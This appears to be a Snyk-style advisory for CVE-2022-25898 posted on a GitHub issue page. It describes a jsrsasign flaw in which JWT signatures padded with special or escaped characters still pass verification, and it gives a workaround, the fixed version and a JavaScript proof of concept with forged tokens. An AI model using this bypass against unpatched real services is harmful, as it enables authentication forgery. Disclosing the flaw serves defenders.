You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
jsrsasign is a free pure JavaScript cryptographic library.
Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature when JWS or JWT signature with non Base64URL encoding special characters or number escaped characters may be validated as valid by mistake.
Workaround:
Validate JWS or JWT signature if it has Base64URL and dot safe string before executing JWS.verify() or JWS.verifyJWT() method.
PoC:
varKJUR=require('jsrsasign');varrsu=require('jsrsasign-util');// [email protected]//// creating valid hs256 jwt - code used to get valid hs256 jwt.// var oHeader = {alg: 'HS256', typ: 'JWT'};// // Payload// var oPayload = {};// var tNow = KJUR.jws.IntDate.get('now');// var tEnd = KJUR.jws.IntDate.get('now + 1year');// oPayload.iss = "https://urldefense.proofpoint.com/v2/url?u=http-3A__foo.com&d=DwIGAg&c=wwDYKmuffy0jxUGHACmjfA&r=3J3pjDmBp7lIUZbkdHkHLg&m=CP36zULZ4oa9S7i8rFsa5Rei7n32BgBaGjoG8lCiqO-pm9ZIzxG9adHdbUE4qski&s=eMfp9lSTyBb95UqdO_sO3ukTKlGihPESsUm5F4yotGk&e=";// oPayload.sub = "mailto:mike@foo.com";// oPayload.nbf = tNow;// oPayload.iat = tNow;// oPayload.exp = tEnd;// oPayload.jti = "id123456";// oPayload.aud = "https://urldefense.proofpoint.com/v2/url?u=http-3A__foo.com_employee&d=DwIGAg&c=wwDYKmuffy0jxUGHACmjfA&r=3J3pjDmBp7lIUZbkdHkHLg&m=CP36zULZ4oa9S7i8rFsa5Rei7n32BgBaGjoG8lCiqO-pm9ZIzxG9adHdbUE4qski&s=bxlm95BhVv7dbGuy_vRD4JBci6ODNdgOU7Q7bNPkv48&e=";// // Sign JWT, password=616161// var sHeader = JSON.stringify(oHeader);// var sPayload = JSON.stringify(oPayload);// var sJWT = KJUR.jws.JWS.sign("HS256",sHeader,sPayload,"616161");//verifying valid and invalid hs256 jwt//validjwtvarvalidJwt="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwOi8vZm9vLmNvbSIsInN1YiI6Im1haWx0bzptaWtlQGZvby5jb20iLCJuYmYiOjE2NTUyMjk3MjksImlhdCI6MTY1NTIyOTcyOSwiZXhwIjoxNjg2NzY1NzI5LCJqdGkiOiJpZDEyMzQ1NiIsImF1ZCI6Imh0dHA6Ly9mb28uY29tL2VtcGxveWVlIn0.eqrgPFuchnot7HgslW8S1xQUkTDBW-_cyhrPgOOFRzI";//invalid jwt with special signsvarinvalidJwt1="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwOi8vZm9vLmNvbSIsInN1YiI6Im1haWx0bzptaWtlQGZvby5jb20iLCJuYmYiOjE2NTUyMjk3MjksImlhdCI6MTY1NTIyOTcyOSwiZXhwIjoxNjg2NzY1NzI5LCJqdGkiOiJpZDEyMzQ1NiIsImF1ZCI6Imh0dHA6Ly9mb28uY29tL2VtcGxveWVlIn0.eqrgPFuchno!@#$%^&*()!@#$%^&*()!@#$%^&*()!@#$%^&*()t7HgslW8S1xQUkTDBW-_cyhrPgOOFRzI";//invalid jwt with additional numbers and signsvarinvalidJwt2="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwOi8vZm9vLmNvbSIsInN1YiI6Im1haWx0bzptaWtlQGZvby5jb20iLCJuYmYiOjE2NTUyMjk3MjksImlhdCI6MTY1NTIyOTcyOSwiZXhwIjoxNjg2NzY1NzI5LCJqdGkiOiJpZDEyMzQ1NiIsImF1ZCI6Imh0dHA6Ly9mb28uY29tL2VtcGxveWVlIn0.eqrgPFuchno\1\1\2\3\4\2\2\3\2\1\2\222\3\1\1\2\2\2\2\2\2\2\2\2\2\2\2\222\23\2\2\2\2t7HgslW8S1xQUkTDBW-_cyhrPgOOFRzI";varisValid=KJUR.jws.JWS.verifyJWT(validJwt,"616161",{alg: ['HS256']});console.log("valid hs256 Jwt: "+isValid);//valid Jwt: true//verifying invalid 1 hs256 jwtvarisValid=KJUR.jws.JWS.verifyJWT(invalidJwt1,"616161",{alg: ['HS256']});console.log("invalid hs256 Jwt by special signs: "+isValid);//invalid Jwt by special signs: true//verifying invalid 2 hs256 jwtvarisValid=KJUR.jws.JWS.verifyJWT(invalidJwt2,"616161",{alg: ['HS256']});console.log("invalid hs256 Jwt by additional numbers and slashes: "+isValid);//invalid Jwt by additional numbers and slashes: true
Detailed paths
Overview
jsrsasign is a free pure JavaScript cryptographic library.
Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature when
JWS
orJWT
signature with non Base64URL encoding special characters or number escaped characters may be validated as valid by mistake.Workaround:
Validate JWS or JWT signature if it has Base64URL and dot safe string before executing
JWS.verify()
orJWS.verifyJWT()
method.PoC:
Remediation
Upgrade
jsrsasign
to version 10.5.25 or higher.References
SNYK-JS-JSRSASIGN-2869122
(CVE-2022-25898) [email protected]
The text was updated successfully, but these errors were encountered: